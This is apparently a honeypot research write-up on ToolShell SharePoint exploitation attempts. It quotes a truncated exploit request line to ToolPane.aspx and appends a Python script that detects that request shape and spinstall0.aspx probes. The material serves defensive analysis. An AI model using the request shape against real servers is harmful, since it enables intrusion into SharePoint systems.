Detected 91 attempts to exploit ToolShell in the first 48 hours; over 50% were marked “clean” on VirusTotal (VT) at the time of observation.
Observed attack chains consistent with public reporting: the spoofing/auth-bypass vulnerability followed by the RCE/deserialization half.
On 2025‑07‑20 (EEST), CISA flagged active exploitation of new SharePoint vulnerabilities. We immediately deployed 20 high‑interaction honeypots to:
The first 24 hours contained mostly traffic that looked like vendors scanning for signs of exploitation, i.e. GET requests for the spinstall0.aspx path.
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1 .... MSOTlPn_Uri=http%3a%2f%2flocalhost%2f_controltemplates%2f15%2fAclEditor.ascx&MSOTlPn_DWP=....
This was an ad-hoc experiment standing up infrastructure rapidly into various public clouds. Results might be much more interesting with a longer-term deployment into less noisy infrastructure.
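Added example (not the authors' tooling or code from the original page): a minimal triage pass that separates the two kinds of traffic described above, GET requests for spinstall0.aspx and POSTs to ToolPane.aspx with DisplayMode=Edit and an MSOTlPn_DWP form field. The tab-separated record layout, the label names, the source addresses and the placeholder bodies are assumptions constructed for illustration.

```python
"""Triage honeypot HTTP captures: compromise-check probes vs. ToolShell POSTs."""
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample records (not real captures): ts, source, method, URI, body.
# Sources are RFC 5737 documentation addresses; bodies are harmless stand-ins.
SAMPLE_LOG = """\
2025-07-20T21:14:03Z\t192.0.2.10\tGET\t/_layouts/15/spinstall0.aspx\t
2025-07-21T02:41:55Z\t198.51.100.7\tPOST\t/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx\tMSOTlPn_Uri=http%3a%2f%2flocalhost%2f_controltemplates%2f15%2fAclEditor.ascx&MSOTlPn_DWP=PLACEHOLDER
2025-07-21T02:50:12Z\t198.51.100.7\tPOST\t/_LAYOUTS/15/toolpane.aspx?displaymode=edit&a=/ToolPane.aspx\tMSOTlPn_DWP=PLACEHOLDER
2025-07-21T03:05:00Z\t203.0.113.5\tPOST\t/_layouts/15/ToolPane.aspx?DisplayMode=Edit\tfoo=bar
2025-07-21T03:09:31Z\t203.0.113.5\tGET\t/_layouts/15/start.aspx\t
"""


def classify(method, uri, body):
    """Label one request. Names are compared case-insensitively so that
    trivial case changes in path or parameters do not slip past the rule."""
    parts = urlsplit(uri)
    path = parts.path.lower()
    query = {k.lower(): [v.lower() for v in vs]
             for k, vs in parse_qs(parts.query).items()}
    form = {k.lower() for k in parse_qs(body, keep_blank_values=True)}
    if path.startswith("/_layouts/") and path.endswith("/toolpane.aspx"):
        if (method == "POST" and "edit" in query.get("displaymode", [])
                and "msotlpn_dwp" in form):
            return "exploit_attempt"   # shape of the POST shown on the page
        return "toolpane_other"        # same endpoint, but not that shape
    if path.endswith("/spinstall0.aspx"):
        return "ioc_probe"             # checking for signs of exploitation
    return "other"


def triage(log_text):
    """Return {source: Counter(label -> hits)} for a tab-separated capture log."""
    per_source = {}
    for line in log_text.splitlines():
        if not line:
            continue
        _ts, src, method, uri, body = line.split("\t", 4)
        per_source.setdefault(src, Counter())[classify(method, uri, body)] += 1
    return per_source


if __name__ == "__main__":
    for src, counts in triage(SAMPLE_LOG).items():
        print(src, dict(counts))
```

Grouping by source makes it easy to tell addresses that only check for spinstall0.aspx from those that send the ToolPane.aspx POST.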